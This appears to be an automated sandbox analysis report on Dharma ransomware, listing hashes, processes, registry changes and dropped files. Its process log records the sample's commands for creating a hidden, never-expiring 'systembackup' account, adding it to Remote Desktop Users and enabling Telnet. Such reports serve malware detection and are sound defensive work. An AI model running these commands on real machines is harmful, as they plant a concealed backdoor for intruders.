| File name: | Dharma.exe |
| Full analysis: | https://app.any.run/tasks/a1795779-1c2b-4a67-9d45-64108ddb0b94 |
| Verdict: | Malicious activity |
| Threats: | Dharma is advanced ransomware that has been observed in the wild since 2016. It is considered to be the second most profitable RaaS operation by the FBI. The malware targets hospitals and state organizations, encrypts files, and demands a payment to restore access to lost information. |
| Analysis date: | May 24, 2025, 15:26:50 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections |
| MD5: | 928E37519022745490D1AF1CE6F336F7 |
| SHA1: | B7840242393013F2C4C136AC7407E332BE075702 |
| SHA256: | 6FB303DD8BA36381948127D44BD8541E4A1AB8AF07B46526ACE08458F2498850 |
| SSDEEP: | 196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W |
| .exe | | | Win64 Executable (generic) (64.6) |
|---|---|---|
| .dll | | | Win32 Dynamic Link Library (generic) (15.4) |
| .exe | | | Win32 Executable (generic) (10.5) |
| .exe | | | Generic Win/DOS Executable (4.6) |
| .exe | | | DOS Executable Generic (4.6) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2020:06:25 10:38:29+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14 |
| CodeSize: | 155648 |
| InitializedDataSize: | 112640 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x13c60 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 680 | "C:\Users\admin\Downloads\ac\mssql.exe" | C:\Users\admin\Downloads\ac\mssql.exe | Dharma.exe | ||||||||||||
User: admin Company: 一普明为(北京)信息技术有限公司 Integrity Level: HIGH Description: Epoolsoft Windows Information View Tools Version: 1.0.0.5 Modules
| |||||||||||||||
| 736 | net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO" | C:\Windows\SysWOW64\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 812 | C:\WINDOWS\system32\net1 start Telnet | C:\Windows\SysWOW64\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1040 | reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f | C:\Windows\SysWOW64\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2384 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2432 | "C:\Users\admin\Downloads\ac\mssql2.exe" | C:\Users\admin\Downloads\ac\mssql2.exe | — | Dharma.exe | |||||||||||
User: admin Company: 一普明为(北京)信息技术有限公司 Integrity Level: MEDIUM Description: Epoolsoft Windows Information View Tools Exit code: 3221226540 Version: 1.0.0.5 Modules
| |||||||||||||||
| 2664 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2840 | net localgroup "Remote Desktop Users" systembackup /add | C:\Windows\SysWOW64\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3008 | "C:\Users\admin\Downloads\ac\nc123.exe" | C:\Users\admin\Downloads\ac\nc123.exe | — | Dharma.exe | |||||||||||
User: admin Integrity Level: MEDIUM Modules
| |||||||||||||||
| 4108 | "C:\Users\admin\Downloads\Dharma.exe" | C:\Users\admin\Downloads\Dharma.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| (PID) Process: | (4108) Dharma.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR SFX |
| Operation: | write | Name: | ac |
Value: ac | |||
| (PID) Process: | (680) mssql.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mssqlaq |
| Operation: | write | Name: | Type |
Value: 1 | |||
| (PID) Process: | (680) mssql.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mssqlaq |
| Operation: | write | Name: | ErrorControl |
Value: 1 | |||
| (PID) Process: | (680) mssql.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mssqlaq |
| Operation: | write | Name: | Start |
Value: 1 | |||
| (PID) Process: | (680) mssql.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mssqlaq |
| Operation: | write | Name: | ImagePath |
Value: \??\C:\Users\admin\Downloads\ac\mssqlaq.sys | |||
| (PID) Process: | (680) mssql.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mssqlaq |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (680) mssql.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vezzsxozybasukco.sys |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (680) mssql.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\vezzsxozybasukco.sys |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (680) mssql.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vezzsxozybasukco |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (680) mssql.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vezzsxozybasukco |
| Operation: | write | Name: | Type |
Value: 1 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4108 | Dharma.exe | C:\Users\admin\Downloads\ac\mssql2.exe | executable | |
MD5:F7D94750703F0C1DDD1EDD36F6D0371D | SHA256:659E441CADD42399FC286B92BBC456FF2E9ECB24984C0586ACF83D73C772B45D | |||
| 4108 | Dharma.exe | C:\Users\admin\Downloads\ac\nc123.exe | executable | |
MD5:597DE376B1F80C06D501415DD973DCEC | SHA256:F47E3555461472F23AB4766E4D5B6F6FD260E335A6ABC31B860E569A720A5446 | |||
| 4108 | Dharma.exe | C:\Users\admin\Downloads\ac\systembackup.bat | text | |
MD5:B4B2F1A6C7A905781BE7D877487FC665 | SHA256:6246B0045CA11DA483E38317421317DC22462A8D81E500DEE909A5269C086B5F | |||
| 4108 | Dharma.exe | C:\Users\admin\Downloads\ac\EVER\SearchHost.exe | executable | |
MD5:8ADD121FA398EBF83E8B5DB8F17B45E0 | SHA256:35C4A6C1474EB870EEC901CEF823CC4931919A4E963C432CE9EFBB30C2D8A413 | |||
| 680 | mssql.exe | C:\Users\admin\Downloads\ac\mssqlaq.sys | executable | |
MD5:B2233D1EFB0B7A897EA477A66CD08227 | SHA256:5FD17E3B8827B5BB515343BC4066BE0814F6466FB4294501BECAC284A378C0DA | |||
| 680 | mssql.exe | C:\Users\admin\Downloads\ac\axzhigrurgknxjlgh.sys | executable | |
MD5:B2233D1EFB0B7A897EA477A66CD08227 | SHA256:5FD17E3B8827B5BB515343BC4066BE0814F6466FB4294501BECAC284A378C0DA | |||
| 680 | mssql.exe | C:\Users\admin\Downloads\ac\bswdcbazvdhkii.sys | executable | |
MD5:B2233D1EFB0B7A897EA477A66CD08227 | SHA256:5FD17E3B8827B5BB515343BC4066BE0814F6466FB4294501BECAC284A378C0DA | |||
| 680 | mssql.exe | C:\Users\admin\Downloads\ac\mssql.sys | executable | |
MD5:B2233D1EFB0B7A897EA477A66CD08227 | SHA256:5FD17E3B8827B5BB515343BC4066BE0814F6466FB4294501BECAC284A378C0DA | |||
| 4108 | Dharma.exe | C:\Users\admin\Downloads\ac\EVER\Everything.ini | text | |
MD5:5531BBB8BE242DFC9950F2C2C8AA0058 | SHA256:4F03AB645FE48BF3783EB58568E89B3B3401956DD17CB8049444058DAB0634D7 | |||
| 680 | mssql.exe | C:\Users\admin\Downloads\ac\ljlvyjygunltfdh.sys | executable | |
MD5:B2233D1EFB0B7A897EA477A66CD08227 | SHA256:5FD17E3B8827B5BB515343BC4066BE0814F6466FB4294501BECAC284A378C0DA | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
3956 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
7236 | SIHClient.exe | GET | 200 | 2.16.253.202:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
7236 | SIHClient.exe | GET | 200 | 2.16.253.202:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
7276 | WINWORD.EXE | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
7276 | WINWORD.EXE | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
7816 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
3956 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
3956 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
7236 | SIHClient.exe | 20.109.210.53:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
officeclient.microsoft.com |
| whitelisted |
roaming.officeapps.live.com |
| whitelisted |